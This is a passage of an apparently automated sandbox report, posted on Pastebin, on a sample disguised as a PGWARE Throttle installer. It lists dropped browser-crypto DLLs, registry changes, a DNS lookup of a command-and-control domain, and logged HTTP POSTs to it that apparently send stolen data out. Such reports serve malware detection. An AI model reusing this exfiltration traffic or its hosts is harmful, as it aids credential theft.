  666. "C:\\Windows\\sysnative\\LogFiles\\Scm\\0efb1c2e-8bcc-468c-aa07-37b1f761840f",
  667. "\\??\\PIPE\\lsarpc",
  668. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB01D.tmp.appcompat.txt",
  669. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB4E1.tmp.WERInternalMetadata.xml",
  670. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB501.tmp.hdmp",
  671. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD40.tmp.mdmp",
  672. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERB01D.tmp.appcompat.txt",
  673. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERB4E1.tmp.WERInternalMetadata.xml",
  674. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERB501.tmp.hdmp",
  675. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\WERBD40.tmp.mdmp",
  676. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\Report.wer",
  677. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\Report.wer.tmp"
  678.  
  679.  
  680. * Deleted Files:
  681. "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp",
  682. "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp",
  683. "C:\\Users\\user\\AppData\\Local\\Temp\\86867814736212939668321.tmp",
  684. "C:\\Users\\user\\AppData\\Local\\Temp\\87383125507293532077856.tmp",
  685. "C:\\Users\\user\\AppData\\Local\\Temp\\8738375678859424949995.tmp",
  686. "C:\\Users\\user\\AppData\\Local\\Temp\\87384063080549063902971.tmp",
  687. "C:\\Users\\user\\AppData\\Local\\Temp\\87384533265966878166663.tmp",
  688. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  689. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  690. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  691. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  692. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  693. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  694. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  695. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  696. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  697. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  698. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  699. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  700. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  701. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  702. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  703. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  704. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  705. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  706. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  707. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  708. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  709. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  710. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  711. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  712. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  713. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  714. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  715. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  716. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  717. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  718. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  719. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  720. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  721. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  722. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  723. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  724. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  725. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  726. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  727. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  728. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  729. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  730. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  731. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  732. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  733. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  734. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  735. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  736. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  737. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
  738. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-8UKGJ.tmp",
  739. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\is-FUI03.tmp",
  740. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-D8VAV.tmp",
  741. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-EOBJF.tmp",
  742. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-080PA.tmp",
  743. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H79UP.tmp",
  744. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H8S3C.tmp",
  745. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-ARK8K.tmp",
  746. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-P68A4.tmp",
  747. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-VASLS.tmp",
  748. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.lnk",
  749. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.pif",
  750. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.url",
  751. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.lnk",
  752. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.pif",
  753. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.url",
  754. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.lnk",
  755. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.pif",
  756. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.url",
  757. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\trees.bmp",
  758. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_isdecmp.dll",
  759. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_setup64.tmp",
  760. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup",
  761. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp",
  762. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a47488466980088aa1a6cb1ec3416907.exe",
  763. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB01D.tmp",
  764. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB01D.tmp.appcompat.txt",
  765. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB4E1.tmp",
  766. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB4E1.tmp.WERInternalMetadata.xml",
  767. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB501.tmp",
  768. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB501.tmp.hdmp",
  769. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD40.tmp",
  770. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBD40.tmp.mdmp",
  771. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\\Report.wer.tmp"
  772.  
  773.  
  774. * Modified Registry Keys:
  775. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000",
  776. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner",
  777. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  778. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  779. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  780. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  781. "HKEY_LOCAL_MACHINE\\Software\\PGWARE\\Throttle",
  782. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\InstalledDate",
  783. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\InternetType",
  784. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Name",
  785. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Restore",
  786. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Serial",
  787. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\SpeedSetting",
  788. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\Updated",
  789. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\PGWARE\\Throttle\\UpdatedDate",
  790. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1",
  791. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Setup Version",
  792. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: App Path",
  793. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\InstallLocation",
  794. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Icon Group",
  795. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: User",
  796. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Selected Tasks",
  797. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Deselected Tasks",
  798. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Inno Setup: Language",
  799. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\DisplayName",
  800. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\DisplayIcon",
  801. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\UninstallString",
  802. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\QuietUninstallString",
  803. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\DisplayVersion",
  804. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\Publisher",
  805. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\URLInfoAbout",
  806. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\HelpLink",
  807. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\URLUpdateInfo",
  808. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\NoModify",
  809. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\NoRepair",
  810. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\InstallDate",
  811. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\MajorVersion",
  812. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\MinorVersion",
  813. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\VersionMajor",
  814. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\VersionMinor",
  815. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Throttle_is1\\EstimatedSize",
  816. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  817. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  818. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  819. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  820. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  821.  
  822.  
  823. * Deleted Registry Keys:
  824. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  825. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  826. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  827. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  828. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner"
  829.  
  830.  
  831. * DNS Communications:
  832.  
  833. "type": "A",
  834. "request": "zdproject.best",
  835. "answers":
  836.  
  837. "data": "194.67.90.124",
  838. "type": "A"
  839.  
  840.  
  841. "data": "176.119.159.222",
  842. "type": "A"
  843.  
  844.  
  845. "data": "185.173.178.138",
  846. "type": "A"
  847.  
  848.  
  849.  
  850.  
  851.  
  852. * Domains:
  853.  
  854. "ip": "194.67.90.124",
  855. "domain": "zdproject.best"
  856.  
  857.  
  858.  
  859. * Network Communication - ICMP:
  860.  
  861. * Network Communication - HTTP:
  862.  
  863. "count": 1,
  864. "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  865. "uri": "http://zdproject.best/index.php",
  866. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  867. "method": "POST",
  868. "host": "zdproject.best",
  869. "version": "1.1",
  870. "path": "/index.php",
  871. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: zdproject.best\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  872. "port": 80
  873.  
  874.  
  875. "count": 1,
  876. "body": "",
  877. "uri": "http://zdproject.best/index.php",
  878. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  879. "method": "POST",
  880. "host": "zdproject.best",
  881. "version": "1.1",
  882. "path": "/index.php",
  883. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: zdproject.best\r\nContent-Length: 65902\r\nCache-Control: no-cache\r\n\r\n",
  884. "port": 80
  885.  
  886.  
  887.  
  888. * Network Communication - SMTP:
  889.  
  890. * Network Communication - Hosts:
  891.  
  892. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!